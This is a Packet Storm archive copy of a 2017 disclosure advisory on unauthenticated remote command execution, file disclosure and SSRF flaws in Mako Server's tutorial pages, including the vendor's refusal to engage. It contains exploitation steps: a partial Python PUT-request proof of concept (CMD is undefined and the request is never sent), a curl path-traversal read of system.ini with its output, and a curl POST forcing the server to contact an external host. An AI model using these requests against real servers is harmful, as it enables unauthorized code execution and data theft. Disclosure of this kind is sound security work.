Exploit the possiblities

Mako Server SSRF / Disclosure / Code Execution

Mako Server SSRF / Disclosure / Code Execution
Posted Sep 15, 2017
Authored by hyp3rlinx | Site hyp3rlinx.altervista.org

Mako Web Server suffers from file disclosure, remote command execution, and server-side request forgery vulnerabilities.

tags | exploit, remote, web, vulnerability
MD5 | a29a13795600789280e244d812b6f170

Mako Server SSRF / Disclosure / Code Execution

Change Mirror Download
[+] SSD Beyond Security: https://blogs.securiteam.com/index.php/archives/3391
[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MAKO-WEB-SERVER-MULTIPLE-UNAUTHENTICATED-VULNERABILIITIES-SECURITEAM.txt
[+] ISR: ApparitionSec

Vulnerabilities Summary
The following advisory describe three (3) vulnerabilities found in Mako Servers tutorial page.

The vulnerabilities found are:

Unauthenticated Arbitrary File Write vulnerability that leads to Remote Command Execution
Unauthenticated File Disclosure
Unauthenticated Server Side Request Forgery
As these tutorial may be used as the basis for production code, it is important for users to be aware of these issues.

As a compact application and web server, the Mako Server helps developers rapidly design secure IoT and web applications. The Mako Server provides
an application server environment from which developers can design and implement complete, custom solutions. The Mako Web Server is ideal for embedded Linux systems.

An independent security researcher, John Page AKA hyp3rlinx, has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program

Vendor response

RealTimeLogic was informed of the vulnerability on Aug 13, but while acknowledging the receipt of the vulnerability information, refused to respond to the
technical claims, to give a fix timeline or coordinate an advisory, saying:

I just sent a formal notification for the commercial license requirement and also we need to put a maintenance contract in place.
Internally I need to set-up a cost allocation account for billing against these support inquiries.

At this time its unclear whether these vulnerabilities are going to be fixed and further attempts to get a status clarification failed.

Vulnerabilities details

Unauthenticated Arbitrary File Write vulnerability that leads to Remote Command Execution:

Mako web-server tutorial does not sufficiently sanitizing the HTTP PUT requests, when an attacker send HTTP PUT request to save.lsp web page, the input passed
to a function responsible for accessing the filesystem.

The attacker input will be saved on the victims machine and can be execute by sending HTTP GET request to manage.lsp

HTTP PUT 'http://VICTIM-IP/examples/save.lsp?ex=2.1'
HTTP GET 'http://VICTIM-IP/examples/manage.lsp?execute=true&ex=2.1&type=lua'

Proof of Concept

import urllib2,time

#MakoServer v2.5 Remote Command Execution 0day
#Credits: John Page AKA hyp3rlinx

print 'MakoServer v2.5 Remote Command Execution'


opener = urllib2.build_opener(urllib2.HTTPHandler)
request = urllib2.Request('http://IP/examples/save.lsp?ex=2.1', data=CMD)
request.add_header('Content-Type', 'text/plain;charset=UTF-8')
request.add_header('X-Requested-With', 'XMLHttpRequest')
request.add_header('Referer', 'http://localhost/Lua-Types.lsp')
request.get_method = lambda: 'PUT'



Unauthenticated File Disclosure

Mako web-server tutorial is not sufficiently sanitizing GET requests, when an attacker send GET request to the URI IP/fs/../.., the input passed
without modification and the response with the file content is returned.

Proof of Concept
The following GET request will response with the C/Windows/system.ini content:

curl -v http://VICTIM-IP/fs/C/Windows/system.ini

* About to connect() to VICTIM-IP port 80
* Trying VICTIM-IP... connected
* Connected to VICTIM-IP (VICTIM-IP) port 80
> GET /fs/C/Windows/system.ini HTTP/1.1
> User-Agent: curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5
> Accept: */*
< HTTP/1.1 200 OK
< Date: Mon, 07 Aug 2017 22:21:27 GMT
< Server: MakoServer.net
< Content-Type: application/octet-stream
< Accept-Ranges: bytes
< Etag: 58b4be20
< Last-Modified: Tue, 28 Feb 2017 00:02:40 GMT
< Content-Length: 219
< Keep-Alive: Keep-Alive
; for 16-bit app support



Server Side Request Forgery

Mako web-server tutorial is not sufficiently sanitizing incoming POST requests, when an attacker sends an POST request to the rtl/appmgr/new-application.lsp
URI, the input will be executed and the server will connect to the attackers machine.

Proof of Concept
Start Wireshark to see successful connections made from Mako Web Server victim machine.

Initiate requests from another machine using CURL:

curl -v -X POST http://VICTIM-IP/rtl/appmgr/new-application.lsp -d io=net -d path=http://EXTERNAL-IP

Network Access:


Disclosure Timeline:
Would like to acknowledge Beyond Securitys SSD program for the help with co-ordination of this vulnerability.
More details can be found on their blog at:


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).



RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?

Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

March 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    14 Files
  • 2
    Mar 2nd
    12 Files
  • 3
    Mar 3rd
    1 Files
  • 4
    Mar 4th
    3 Files
  • 5
    Mar 5th
    15 Files
  • 6
    Mar 6th
    23 Files
  • 7
    Mar 7th
    15 Files
  • 8
    Mar 8th
    15 Files
  • 9
    Mar 9th
    3 Files
  • 10
    Mar 10th
    2 Files
  • 11
    Mar 11th
    1 Files
  • 12
    Mar 12th
    16 Files
  • 13
    Mar 13th
    20 Files
  • 14
    Mar 14th
    14 Files
  • 15
    Mar 15th
    17 Files
  • 16
    Mar 16th
    15 Files
  • 17
    Mar 17th
    5 Files
  • 18
    Mar 18th
    2 Files
  • 19
    Mar 19th
    7 Files
  • 20
    Mar 20th
    15 Files
  • 21
    Mar 21st
    18 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2018 Packet Storm. All rights reserved.

Security Services
Hosting By